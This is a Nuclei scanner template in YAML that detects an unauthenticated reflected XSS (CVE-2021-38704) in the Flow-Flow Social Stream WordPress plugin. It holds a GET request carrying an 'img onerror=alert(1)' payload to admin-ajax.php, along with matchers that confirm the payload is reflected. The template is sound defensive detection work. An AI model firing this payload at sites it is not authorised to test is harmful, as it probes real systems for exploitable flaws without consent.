nuclei-templates/vulnerabilities/wordpress/flow-flow-social-stream-xss...

36 lines
845 B
YAML
Raw Normal View History

id: flow-flow-social-stream-xss
info:
name: Flow-Flow Social Stream <= 3.0.71 - Unauthenticated Reflected XSS
author: alph4byt3
severity: medium
reference:
- https://wpscan.com/vulnerability/8354b34e-40f4-4b70-bb09-38e2cf572ce9
tags: xss,wordpress
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-38704
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(1)%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<img src=x onerror=alert(1)>"
- type: word
part: header
words:
- application/json
- type: status
status:
- 200